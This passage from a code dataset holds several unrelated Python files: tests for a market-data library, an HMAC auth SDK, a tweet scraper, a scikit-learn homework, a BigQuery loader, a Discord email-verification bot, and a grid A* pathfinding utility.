get_asset_from_ticker method.\"\"\"\n asset = market_data.get_asset_from_ticker(\n ticker=\"AAPL\",\n )\n assert 
isinstance(asset, AssetModel)\n\n\n@vcr.use_cassette(\"tests/data/cassettes/test_get_asset.yaml\")\ndef test_get_get_asset_from_ticker_nodb(\n market_data_nodb: MarketData,\n) -> None:\n \"\"\"Test get_asset_from_ticker method.\"\"\"\n assert not market_data_nodb.use_db\n _asset = market_data_nodb.get_asset_from_ticker(\n ticker=\"AAPL\",\n )\n assert isinstance(_asset, AssetModel)\n asset = market_data_nodb.get_asset(\n ticker=\"AAPL\",\n )\n assert isinstance(asset, AssetModel)\n assert asset == _asset\n\n\n@pytest.mark.vcr()\ndef test_get_assets(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_assets method.\"\"\"\n assets = market_data.get_assets()\n assert isinstance(assets, list)\n\n\n@pytest.mark.my_vcr()\ndef test_get_financials(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_total_returns method.\"\"\"\n fin_df = market_data.get_financials(\n ticker=\"AAPL\",\n )\n assert isinstance(fin_df, pd.DataFrame)\n\n\n@pytest.mark.my_vcr()\ndef test_investment_universe_with_top_market_cap(\n market_data: MarketData,\n) -> None:\n \"\"\"Test the investment universe initialization with the top_market_cap.\"\"\"\n _top = 2\n\n tickers = market_data.get_top_market_cap_tickers(\n top=_top, tickers=InvestmentUniverse(name=UniverseName.FAANG).tickers\n )\n assert len(tickers) == _top\n","repo_name":"Ale-Cas/optitrader","sub_path":"tests/market/test_market_data.py","file_name":"test_market_data.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2853203503","text":"# -*- coding: utf8 -*-\n__author__ = 'Jagerzhang'\nimport sys\nimport hmac\nimport hashlib\nimport base64\nimport time\n\n\nclass HmacAuth():\n \"\"\"生成Hmac(hmac-sha256)鉴权头部\n :param hmac_user, String, 可选, 在class初始化时预设HMAC账号,可被函数覆盖\n :param hmac_secret, String, 可选, 在class初始化时预设HMAC密钥,可被函数覆盖\n :return Class Object\n \"\"\"\n def __init__(self, hmac_user=None, hmac_secret=None):\n self.hmac_user = hmac_user\n self.hmac_secret = hmac_secret\n self.python_version = sys.version_info[0]\n\n def _sha256_digest(self, content):\n \"\"\" sha256计算内容摘要\n :param content, String, 内容\n \"\"\"\n if self.python_version > 2:\n content_bytes = bytes(content, \"utf-8\")\n\n else:\n content_bytes = bytes(content).decode(\"utf-8\")\n\n content_sha256_digest = hashlib.sha256(content_bytes).digest()\n content_sha256_digest_base64_decode = base64.b64encode(\n content_sha256_digest).decode()\n content_digest = 'SHA-256={0}'.format(\n content_sha256_digest_base64_decode)\n return content_digest\n\n def _hmac_sha256(self, secret, str_to_sign):\n \"\"\"生成sha256加密串\n :param secret, String, 指定密钥\n :param str_to_sign, String, 已拼装待签名的数据\n \"\"\"\n if self.python_version > 2:\n hmac_key = bytes(secret, \"utf-8\")\n msg_sign = bytes(str_to_sign, \"utf-8\")\n\n else:\n hmac_key = bytes(secret)\n msg_sign = bytes(str_to_sign)\n\n signature = hmac.new(hmac_key, msg_sign,\n digestmod=hashlib.sha256).digest()\n str_base64 = base64.b64encode(signature).decode()\n return str_base64\n\n def get_auth_headers(self, hmac_user=None, hmac_secret=None, body=\"\"):\n \"\"\"获取Hmac鉴权头部\n :param String, 可选, 指定Hmac账号,可以覆盖class预设的Hmac账号\n :param String, 可选, 指定hmac密钥,可以覆盖class预设的Hmac密钥\n :param String, 可选,指定请求Body内容,当网关要求验签body的时候必传,Get请求则传入空值\n :param Dict, 返回Hmac认证头部字典\n \"\"\"\n if not hmac_user:\n hmac_user = self.hmac_user\n\n if not hmac_secret:\n hmac_secret = self.hmac_secret\n\n # 生成body的sha256加密串\n body_digest = self._sha256_digest(body)\n\n # 
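`_sha256_digest` and `_hmac_sha256` above are thin wrappers over the standard library; the whole signing core fits in a few lines. A sketch with a dummy secret and an empty body:

# HMAC-SHA256 signing core (dummy secret, empty body).
import base64
import hashlib
import hmac
import time

secret = b"dummy-secret"
gm_time = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
body_digest = "SHA-256=" + base64.b64encode(hashlib.sha256(b"").digest()).decode()
str_to_sign = f"date: {gm_time}\ndigest: {body_digest}"
signature = base64.b64encode(
    hmac.new(secret, str_to_sign.encode("utf-8"), hashlib.sha256).digest()
).decode()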
生成当前GMT时间,注意格式不能改变,必须形如:Wed, 14 Aug 2019 09:09:28 GMT\n gm_time = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime())\n\n # 拼装待签名的数据\n str_to_sign = \"date: {0}\\ndigest: {1}\".format(gm_time, body_digest)\n\n # 生成签名\n signature = self._hmac_sha256(hmac_secret, str_to_sign)\n\n # 拼装headers\n headers = {}\n headers[\"Authorization\"] = (\n 'hmac username=\"{0}\", algorithm=\"hmac-sha256\", headers=\"date digest\",'\n 'signature=\"{1}\"'.format(hmac_user, signature))\n headers[\"Digest\"] = body_digest\n headers[\"Date\"] = gm_time\n return headers\n\n","repo_name":"jagerzhang/hmac-sdk","sub_path":"python/hmac_auth.py","file_name":"hmac_auth.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"41939051630","text":"import requests\nfrom bs4 import BeautifulSoup\n\ntarget_url = ''#twitter_url\nr = requests.get(target_url)\n\nsoup = BeautifulSoup(r.text,'lxml')\n\nmain_data = soup.find(\"p\", attrs={\"class\":\"TweetTextSize\"})\n\nprint('%s' %(main_data))\n\ndl_file = \"fm.txt\"\ntry:\n file = open(dl_file,'w')\n data = file.write(main_data)\nexcept Exception as e:\n print(e)\n print('error')\nfinally:\n file.close()\n\nprint('fin')\n","repo_name":"synic-m/tweetscraper","sub_path":"befor_v/scraping_test.py","file_name":"scraping_test.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8709699517","text":"#!/usr/bin/python\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom sklearn import impute\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import tree\nfrom sklearn.model_selection import KFold\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import datasets, linear_model\n# from sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_score\n# Each of the steps defined in the main() function calls one or more of the functions stubbed out\n# below. Fill in the function bodies below, paying attention to how they are called and what kinds\n# of values are returned. Wherever possible, you should use tools from the scikit-learn codebase\n# to accomplish each task; note that you'll have to include relevant import statements.\n#\ndef main(file_name):\n #\n # 0. Read in the data. Store the attributes in a pandas DataFrame called x, and class values\n # (last column) in a Series object called y.\n\n x, y = read_data(file_name)\n\n #\n # 1. Handle missing values in the data using an sklearn SimpleImputer. The transformed\n # data should be stored in a numpy array x_imp.\n x_imp = impute_data(x)\n\n #\n # 2. Split the imputed data into training and test sets, where 75% of the data is used for\n # training\n x_train, x_test, y_train, y_test = train_test_split(x_imp, y)\n\n # 3. Print out the class distributions for both training and test\n train_pos_count, train_neg_count = get_class_distrib(y_train)\n test_pos_count, test_neg_count = get_class_distrib(y_test)\n print(\"training class distrib: {:.2f}, {:.2f}\".format(train_pos_count/len(y_train),\n train_neg_count/len(y_train)))\n print(\"test class distrib: {:.2f}, {:.2f}\".format(test_pos_count/len(y_test),\n test_neg_count/len(y_test)))\n\n #\n # 4. 
Learn a decision tree model and get its accuracy on both the training and test data\n tree_clf = learn_tree(x_train, y_train)\n acc_train = test_model(tree_clf, x_train, y_train)\n acc_test = test_model(tree_clf, x_test, y_test)\n print(\"decision tree training acc: {:.4f}, test acc: {:.4f}\".format(acc_train, acc_test))\n\n #\n # 5. Print out the names of the top five most important features in the tree from 4. You can\n # access them through the feature_importances_ data member of the classifier object.\n for feat, score in top_features(tree_clf, x.columns, 5):\n print(\"{} ({:.4f})\".format(feat, score))\n\n #\n # 6. Repeat exercise 4, this time using a scikit-learn k-NN classifier that uses\n # a Euclidean distance metric. Print the test set accuracy obtained from using several\n # values of k. What is the best value of k?\n k_vals = [1, 3, 5, 7, 9, 19, 39, 79, 159, 319]\n for k in k_vals:\n knn_clf = learn_knn(x_train, y_train, k)\n acc_test = test_model(knn_clf, x_test, y_test)\n print(\"k-nn {} test acc: {:.4f}\".format(k, acc_test))\n\n #\n # 7. Repeat exercise 6, but this time scale the data first using the scikit-learn\n # StandardScaler to preprocess the data. Use the make_pipeline function() to create a\n # pipeline.\n for k in k_vals:\n knn_clf_std = learn_knn_standard(x_train, y_train, k)\n acc_test = test_model(knn_clf_std, x_test, y_test)\n print(\"k-nn {} (standardized) test acc: {:.4f}\".format(k, acc_test))\n\n #\n # 8. Now repeat the classification process from exercise 4, using 10-fold cross-validation\n # instead of the single training/test split.\n acc_test = crossval_tree(x_imp, y, 10)\n print(\"decision tree {}-fold cross-validation acc: {:.4f}\".format(10, acc_test))\n\n\n#\n# Fill in the function bodies for each of the functions below. The purpose of each is described\n# in the main() function above. The types of the return values can be found in the comments\n# below. Note that each has been initialized to None to enable incremental development of the code.\n#\n\ndef read_data(file_name):\n # Read in the data. Store the attributes in a pandas DataFrame called x, and class values\n # (last column) in a Series object called y.\n x = pd.read_csv(file_name)\n newX = x.drop(['class'], axis=1)\n y = x.iloc[:,-1]\n return newX, y # x is a DataFrame, y is a Series\n\n\ndef impute_data(x):\n # 1. Handle missing values in the data using an sklearn SimpleImputer. The transformed\n # data should be stored in a numpy array x_imp.\n x_imp = impute.SimpleImputer(missing_values=np.nan, strategy='constant', fill_value=0)\n ans = x_imp.fit_transform(x)\n return ans # x is a numpy.array\n\n\ndef get_class_distrib(class_labels):\n neg, pos = class_labels.value_counts() # 0 -> neg, 1->pos\n return pos, neg # pos and neg are integer counts\n\ndef learn_tree(x, y):\n # 4. 
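Steps 1–2 above — impute, then split 75/25 — are a standard scikit-learn prelude; the imputer here fills missing cells with a constant 0 rather than a statistic. End to end on toy arrays:

# Impute -> split -> fit on toy data (mirrors steps 1-2 and 4 above).
import numpy as np
from sklearn.impute import SimpleImputer
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier

X = np.array([[1.0, np.nan], [2.0, 3.0], [np.nan, 0.0], [4.0, 1.0]])
y = np.array([0, 1, 0, 1])

X_imp = SimpleImputer(strategy="constant", fill_value=0).fit_transform(X)
X_tr, X_te, y_tr, y_te = train_test_split(X_imp, y, train_size=0.75, random_state=0)
clf = DecisionTreeClassifier().fit(X_tr, y_tr)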
Learn a decision tree model and get its accuracy on both the training and test data\n clf = tree.DecisionTreeClassifier()\n clf = clf.fit(x, y)\n return clf # clf is a tree classifier object\n\n\ndef test_model(clf, x, y):\n myans = clf.predict(x)\n theiry = y.to_numpy()\n if len(myans) == len(theiry):\n acc = np.sum(myans == theiry)\n else:\n print(\"Invalid Comparision\")\n return acc/len(myans) # acc is a float\n\n\ndef top_features(clf, col_names, num):\n mylist = [];\n for x,y in zip(col_names, clf.feature_importances_):\n mylist.append((x,y))\n sortedlist = sorted(mylist, key=lambda x: x[1])\n return sortedlist[len(sortedlist)-num:] # feat_scores is a list of (feature name, float) tuples\n\n\ndef learn_knn(x, y, k):\n clf = KNeighborsClassifier(n_neighbors=k)\n clf.fit(x, y)\n return clf # clf is a knn classifier object\n\n\ndef learn_knn_standard(x, y, k):\n stdScaler = StandardScaler()\n clf = KNeighborsClassifier(n_neighbors=k)\n model = Pipeline([('sel', stdScaler), ('clf', clf)])\n pipeline = model.fit(x, y)\n return pipeline # clf is a pipeline object\n\ndef crossval_tree(x, y, folds):\n KNN = KNeighborsClassifier()\n y_pred = cross_val_score(KNN, x, y, cv=folds)\n acc = [x for x in y_pred if x > 0]\n return sum(acc)/len(acc) # acc is a float\n\n\n#########################\n\nif __name__ == '__main__':\n data_file_name = sys.argv[1]\n # data_file_name = 'polish_bankruptcy_data.csv'\n main(data_file_name)\n\n\n\n\n\n\n\n","repo_name":"achen173/Analytics-With-Python","sub_path":"Analytics_using_scikit_learn/polish_bankruptcy.py","file_name":"polish_bankruptcy.py","file_ext":"py","file_size_in_byte":6516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23903879374","text":"from google.cloud import bigquery\nimport pandas as pd\nimport constant\nimport logging\n\nclass bq_load:\n \n def insert_func(ti):\n project_name=constant.PROJECT_NAME #name of the active project in GCP\n dataset_id = constant.DATASET_ID #name of the dataset where the target table lies #VALUES CAN BE FOUND IN CONSTANTS FOLDER\n table_name=constant.TABLE_NAME #name of the table where the data is to be uploaded\n \n client=bigquery.Client() \n table_id=project_name+'.'+dataset_id+'.'+table_name #each table in BQ is refernced using the format - `project_name.dataset_name.table_name`\n\n #returns the filename of the file which triggered the cloud function, this was pushed to xcoms \n file_name=ti.xcom_pull(key='return_value', task_ids=['return_file_name']) \n \n #location of the uploaded file in the GCS bucket\n uri = 'gs://' + 'test_bucket_69420'+ '/' + file_name[0] \n\n #reading the xlsx file from the GCS bucket with the uri and setting the header as the second column of the excel file\n df=pd.read_excel(uri,header=[1]) \n\n\n #START\n #filling the null values with appropriate default values\n df[['Area code','Sub Category','Category']]=(df.loc[:,['Area code','Sub Category','Category']]).fillna('') \n df[['Feature Factors','Unnamed: 6']]=(df.loc[:,['Feature Factors','Unnamed: 6']]).fillna(0)\n df[['Multiplying Factor']]=(df.loc[:,['Multiplying Factor']]).fillna(1)\n df[['Unnamed: 7']]=(df.loc[:,['Unnamed: 7']]).fillna('0,0')\n #END\n\n rows_to_insert=[]\n\n #START\n #reading the excel data row by row an appending it to a list of json values with a fixed schema\n for i in range (1,df.shape[0]):\n x=df.iloc[i,:] # x storeing row data (it changes per run of the loop)\n rows_to_insert.append({ \n \"Contributor\": x[0],\n \"Sub_category\": x[1],\n 
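`learn_knn_standard` above wires the scaler and k-NN into a Pipeline so scaling is re-fit per training split, which is the right way to combine it with cross-validation. Two caveats in the code: `crossval_tree` instantiates a `KNeighborsClassifier` even though step 8 asks to cross-validate the decision tree, and its `[x for x in y_pred if x > 0]` filter silently drops zero-accuracy folds — `scores.mean()` is the usual reduction. A compact equivalent:

# Scaler + k-NN pipeline evaluated with 10-fold cross-validation (toy data).
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 4))
y = (X[:, 0] > 0).astype(int)

model = make_pipeline(StandardScaler(), KNeighborsClassifier(n_neighbors=5))
print(cross_val_score(model, X, y, cv=10).mean())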
\"Category\": x[2],\n \"Multiplying_factor\": int(x[3]),\n \"Area_code\": x[4],\n \"Feature_Factors\": {\n \"Feature_1\": x[5],\n \"Feature_2\": x[6],\n \"Feature_3\": [(x[7].split(','))[0],(x[7].split(','))[1]] #splitting Feature_3 wherever there is comma.\n }\n })\n\n\n errors = client.insert_rows_json(table_id, rows_to_insert, row_ids=[None] * len(rows_to_insert)) # Make an API request.\n if errors == []:\n logging.info(\"New rows have been added.\")\n else:\n logging.error(\"Encountered errors while inserting rows: {}\".format(errors))\n\n\nbq_load.insert_func.__doc__=\"\"\"A function that takes filename of the uploaded file which cased the cloud function trigger, \n then transform that file into a pandas datafranme , extracts the value line by line , saves it to a list of json values \n and then performs a batch upload into BigQuery \"\"\"\n\n\n","repo_name":"Adarsh4503/use_case_test","sub_path":"src/dev/dag/upload_to_bq.py","file_name":"upload_to_bq.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38597945107","text":"from dashboard import candidate_module\nfrom business.models import BusinessUser\nfrom beta_invite.models import Campaign\nfrom beta_invite.util import email_sender\nfrom dashboard.models import Candidate\nimport common\n\n\ndef get_campaign_for_dashboard(request, business_user):\n\n campaign_id = request.GET.get('campaign_id')\n if campaign_id:\n return Campaign.objects.get(pk=campaign_id)\n # default campaign\n else:\n return business_user.campaigns.all()[0]\n\n\ndef get_business_user_and_campaign(request, pk):\n business_user = BusinessUser.objects.get(pk=pk)\n campaign = get_campaign_for_dashboard(request, business_user)\n return business_user, campaign\n\n\ndef get_checked_box_candidates(campaign_id, request):\n candidates = Candidate.objects.filter(campaign_id=campaign_id)\n return [c for c in candidates if request.GET.get('{}_checkbox'.format(c.id))]\n\n\ndef send_email_from_dashboard(request, campaign):\n\n # enters here when sending an email\n if request.GET.get('send_mail') is not None:\n\n candidates = get_checked_box_candidates(campaign.id, request)\n\n email_sender.send(objects=candidates,\n language_code='es',\n body_input=request.GET.get('email_body'),\n subject=request.GET.get('email_subject'),\n with_localization=False,\n body_is_filename=False)\n","repo_name":"palaciossruben/acerto","sub_path":"testing_webpage/business/dashboard_module.py","file_name":"dashboard_module.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14903039759","text":"from nextcord.ext import commands, application_checks\nfrom nextcord import Member\nimport mysql.connector\nimport hashlib\nimport boto3\nfrom settings import *\nimport sentry_sdk\n\nsentry_sdk.init(\n dsn=\"https://88e20802832b5ef426b1bb1c03a407f0@o4506112163643392.ingest.sentry.io/4506112169345024\",\n # Set traces_sample_rate to 1.0 to capture 100%\n # of transactions for performance monitoring.\n traces_sample_rate=1.0,\n # Set profiles_sample_rate to 1.0 to profile 100%\n # of sampled transactions.\n # We recommend adjusting this value in production.\n profiles_sample_rate=1.0,\n)\n\nses_client = boto3.client('ses', region_name=\"ca-central-1\", aws_access_key_id=SES_PUB, aws_secret_access_key=SES_PRIV)\n\nbot = commands.Bot()\n\n@bot.slash_command(description=\"Force verify a 
user!\")\n@application_checks.has_permissions(manage_messages=True)\nasync def force_verify(i, member: Member, email: str):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n role = i.guild.get_role(VERIFIED_ROLE)\n await member.add_roles(role, reason=email)\n query = \"\"\"INSERT INTO users (discord_id, cmail) VALUES (%s,%s);\"\"\"\n data = (member.id, email)\n cursor.execute(query, data)\n connection.commit()\n cursor.close()\n connection.close()\n await i.send(\"Force verified member!\", ephemeral=True)\n\n@bot.slash_command(description=\"Gets a member's cmail\")\n@application_checks.has_permissions(manage_messages=True)\nasync def get_email(i, member: Member):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n query = \"\"\"SELECT cmail FROM users WHERE discord_id=%s;\"\"\"\n data = (member.id,)\n cursor.execute(query, data)\n data = cursor.fetchone()\n cursor.close()\n connection.close()\n if data is None:\n await i.send(\"No cmail address found!\", ephemeral=True)\n else:\n await i.send(\"cmail: \" + data[0].decode(), ephemeral=True)\n\n@bot.slash_command(description=\"Verifies your account and gives you access to the server!\")\nasync def verify(i, cmail: str):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n if not cmail.endswith(\"@cmail.carleton.ca\"):\n await i.send(\"Error: You must use a Carleton University email address!\", ephemeral=True)\n return\n query = \"SELECT * FROM banned WHERE cmail=%s;\"\n cursor.execute(query, (cmail,))\n user = cursor.fetchone()\n if user is not None:\n await i.send(\"Error: You have been banned from this server!\", ephemeral=True)\n channel = i.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"Warning: User (\" + i.user.mention + \" - \" + cmail + \") tried to join but they are banned!\")\n cursor.close()\n connection.close()\n return\n query = \"SELECT * FROM users WHERE discord_id=%s OR cmail=%s;\"\n cursor.execute(query, (i.user.id,cmail))\n user = cursor.fetchone()\n if user is not None:\n await i.send(\"Error: You have already joined this server!\", ephemeral=True)\n channel = i.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"Warning: User (\" + i.user.mention + \" - \" + cmail + \") tried to join multiple times!\")\n cursor.close()\n connection.close()\n return\n m = hashlib.sha256()\n hstr = HASH_PREFIX + cmail\n m.update(hstr.encode('utf-8'))\n h = m.hexdigest()[0:8]\n message = \"Your verification code is: \" + h\n send_args = {\n 'Source': FROM,\n 'Destination': {\n 'ToAddresses': [\n cmail,\n ],\n },\n 'Message': {\n 'Subject': {'Data': \"Discord Verification Code\"},\n 'Body': {'Text': {'Data': message}, 'Html': {'Data': message}}}}\n ses_client.send_email(**send_args)\n cursor.close()\n connection.close()\n await i.send(\"A verification code has been sent to your email. It will be in your spam folder. 
Use `/verify_complete ` to become verified!\", ephemeral=True)\n\n@bot.slash_command(description=\"Verifies your account and gives you access to the server!\")\nasync def verify_complete(i, cmail: str, code: str):\n await i.response.defer(ephemeral=True)\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n m = hashlib.sha256()\n hstr = HASH_PREFIX + cmail\n m.update(hstr.encode('utf-8'))\n h = m.hexdigest()[0:8]\n if h.lower() == code.lower():\n member = i.user\n role = i.guild.get_role(VERIFIED_ROLE)\n await member.add_roles(role, reason=cmail)\n query = \"\"\"INSERT INTO users (discord_id, cmail) VALUES (%s,%s);\"\"\"\n data = (member.id, cmail)\n cursor.execute(query, data)\n connection.commit()\n await i.send(\"Successfully verified!\", ephemeral=True)\n cursor.close()\n connection.close()\n return\n else:\n channel = i.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"Warning: User (\" + i.user.mention + \" - \" + cmail +\") failed to verify, please manually review!\")\n await i.send(\"Failed to verify, moderators have been notified and will manually approve\", ephemeral=True)\n cursor.close()\n connection.close()\n return\n\n\n@bot.event\nasync def on_ready():\n print('Ready!')\n\n@bot.event\nasync def on_error(event):\n channel = event.guild.get_channel(INFO_CHANNEL)\n await channel.send(\"An error occurred!!!\\n\" + event)\n\n@bot.event\nasync def on_member_ban(guild, user):\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n channel = guild.get_channel(INFO_CHANNEL)\n query = \"SELECT stud_id FROM users WHERE discord_id=%s;\"\n cursor.execute(query, (user.id,))\n u = cursor.fetchone()\n if u is None:\n await channel.send(\"Warning: User (\" + user.mention + \") was banned but no matching student id was found!\")\n return\n stud_id = u[0]\n query = \"\"\"INSERT INTO banned (stud_id) VALUES (%s);\"\"\"\n data = (stud_id,)\n cursor.execute(query, data)\n connection.commit()\n cursor.close()\n connection.close()\n await channel.send(\"Info: User (\" + user.mention + \") was banned!\")\n\n@bot.event\nasync def on_member_unban(guild, user):\n connection = mysql.connector.connect(host=DB_HOST,\n database=DB_NAME,\n user=DB_USER,\n password=DB_PASS)\n\n cursor = connection.cursor(prepared=True)\n channel = guild.get_channel(INFO_CHANNEL)\n query = \"SELECT stud_id FROM users WHERE discord_id=%s;\"\n cursor.execute(query, (user.id,))\n u = cursor.fetchone()\n if u is None:\n await channel.send(\"Warning: User (\" + user.mention + \") was banned but no matching student id was found!\")\n return\n stud_id = u[0]\n query = \"\"\"DELETE FROM banned WHERE stud_id=%s;\"\"\"\n data = (stud_id,)\n cursor.execute(query, data)\n connection.commit()\n cursor.close()\n connection.close()\n await channel.send(\"Info: User (\" + user.mention + \") was unbanned!\")\n\nbot.run(TOKEN)\n","repo_name":"carleton-student-engineering-society/BITSocBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3284623008","text":"#!usr/bin/python3\r\n# -*-coding: utf-8 -*-\r\n\r\nimport pickle\r\n\r\n\r\nclass Define(object):\r\n INF = float(\"inf\")\r\n\r\n\r\ndef sgn(num):\r\n if num > 0:\r\n return 1\r\n elif num < 0:\r\n return -1\r\n else:\r\n return 
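The bot never stores verification codes: both `/verify` and `/verify_complete` re-derive the 8-character code as the leading hex characters of SHA-256 over a server-side prefix plus the address, so the two commands agree without shared state. (Note, though, that the ban handlers select a `stud_id` column from `users` while the verify path only ever inserts `discord_id` and `cmail`, so the two code paths appear to disagree about the schema.) The derivation in isolation, with a dummy prefix:

# Deriving the e-mail verification code (dummy prefix stands in for the secret).
import hashlib

HASH_PREFIX = "dummy-prefix"
cmail = "student@cmail.carleton.ca"
code = hashlib.sha256((HASH_PREFIX + cmail).encode("utf-8")).hexdigest()[:8]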
0\r\n\r\n\r\ndef save_byte(obj, file_path):\r\n with open(file_path, \"wb\") as f:\r\n pickle.dump(obj, f)\r\n\r\n\r\ndef load_byte(file_path):\r\n try:\r\n with open(file_path, \"rb\") as f:\r\n return pickle.load(f)\r\n except FileNotFoundError:\r\n return False\r\n\r\n\r\ndef double_range(*args):\r\n if len(args) == 2:\r\n for i in range(args[0]):\r\n for j in range(args[1]):\r\n yield (i, j)\r\n elif len(args) == 4:\r\n for i in range(args[0], args[1]):\r\n for j in range(args[2], args[3]):\r\n yield (i, j)\r\n elif len(args) == 6:\r\n for i in range(args[0], args[1], args[2]):\r\n for j in range(args[3], args[4], args[5]):\r\n yield (i, j)\r\n else:\r\n raise TypeError(\"double_range expected 2 or 4 or 6 arguments, got %d\" % len(args))\r\n\r\n\r\ndef log10(num):\r\n return len(str(int(num)))\r\n\r\n\r\nclass Pos(object):\r\n \"\"\"\r\n Pos Object -- deal with position\r\n \"\"\"\r\n direction = [(0, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0)]\r\n r_direction = {(0, 0): 0, (-1, 1): 1, (0, 1): 2,\r\n (1, 1): 3, (1, 0): 4, (1, -1): 5,\r\n (0, -1): 6, (-1, -1): 7, (-1, 0): 8}\r\n\r\n def __init__(self, x, y, width=Define.INF, height=Define.INF):\r\n self._x, self._y = None, None\r\n self.width = width\r\n self.height = height\r\n self.x, self.y = x, y\r\n\r\n def __add__(self, other):\r\n assert isinstance(other, tuple), \"Pos object can only add tuple\"\r\n return Pos(self.x + other[0], self.y + other[1], self.width, self.height)\r\n\r\n def __eq__(self, other):\r\n if (self.x, self.y, self.width, self.height) == (other.x, other.y, other.width, other.height):\r\n return True\r\n else:\r\n return False\r\n\r\n def area(self):\r\n for dx, dy in Pos.direction:\r\n yield self.limit_x(dx + self.x), self.limit_y(dy + self.y)\r\n\r\n def limit_x(self, arg):\r\n if arg >= self.width:\r\n arg -= self.width\r\n elif arg < 0:\r\n arg += self.width\r\n return arg\r\n\r\n def limit_y(self, arg):\r\n if arg >= self.height:\r\n arg -= self.height\r\n elif arg < 0:\r\n arg += self.height\r\n return arg\r\n\r\n @property\r\n def x(self):\r\n return self._x\r\n\r\n @x.setter\r\n def x(self, arg):\r\n self._x = self.limit_x(arg)\r\n\r\n @property\r\n def y(self):\r\n return self._y\r\n\r\n @y.setter\r\n def y(self, arg):\r\n self._y = self.limit_y(arg)\r\n\r\n @staticmethod\r\n def get_direction(index):\r\n return Pos.direction[index]\r\n\r\n @staticmethod\r\n def get_direction_index(dx, dy):\r\n return Pos.direction.index((dx, dy))\r\n\r\n\r\nclass Calculate(object):\r\n \"\"\"\r\n Calculate Object -- including some calculation function\r\n \"\"\"\r\n @staticmethod\r\n def find_way_area(x, y):\r\n for ele in [(-1, -1, 3), (0, -1, 2), (1, -1, 3), (1, 0, 2),\r\n (1, 1, 3), (0, 1, 2), (-1, 1, 3), (-1, 0 ,2)]:\r\n yield x + ele[0], y + ele[1], ele[2]\r\n\r\n # # using A* algorithm\r\n @staticmethod\r\n def find_way(map_data, current_x, current_y, target_x, target_y):\r\n # # map_data: 0 means no obstacle, >0 means certain cost obstacle(2 is one tiles cost),\r\n # -1 means obstacle cannot pass\r\n # # do_data: A star point data, a dict of parent, G, H\r\n # # return: if found return next direction, else return 0\r\n assert isinstance(map_data, list)\r\n width = len(map_data)\r\n height = len(map_data[0])\r\n do_data = [[{\"X\": x, \"Y\": y, \"H\": 2 * (abs(target_x - x) + abs(target_y - y)), \"G\": 0, \"P\": None}\r\n for y in range(height)] for x in range(width)]\r\n open_list = [do_data[current_x][current_y]]\r\n close_list = []\r\n current_tile = 
do_data[current_x][current_y]\r\n while open_list and (do_data[target_x][target_y] is not current_tile):\r\n current_tile = None\r\n for ele in open_list:\r\n if not current_tile or ele[\"H\"] + ele[\"G\"] < current_tile[\"H\"] + current_tile[\"G\"]:\r\n current_tile = ele\r\n try:\r\n open_list.remove(current_tile)\r\n except ValueError:\r\n print(open_list)\r\n print(current_tile)\r\n raise\r\n close_list.append(current_tile)\r\n for x, y, d in Calculate.find_way_area(current_tile[\"X\"], current_tile[\"Y\"]):\r\n if 0 <= x < width and 0 <= y < height:\r\n if do_data[x][y] in close_list or map_data[x][y] < 0:\r\n continue\r\n elif do_data[x][y] not in open_list:\r\n open_list.append(do_data[x][y])\r\n do_data[x][y][\"G\"] = d + current_tile[\"G\"]\r\n do_data[x][y][\"P\"] = current_tile\r\n else:\r\n if d + current_tile[\"G\"] < do_data[x][y][\"G\"]:\r\n do_data[x][y][\"G\"] = d + current_tile[\"G\"]\r\n do_data[x][y][\"P\"] = current_tile\r\n\r\n if open_list:\r\n try:\r\n while current_tile[\"P\"] and current_tile[\"P\"] is not do_data[current_x][current_y]:\r\n current_tile = current_tile[\"P\"]\r\n return 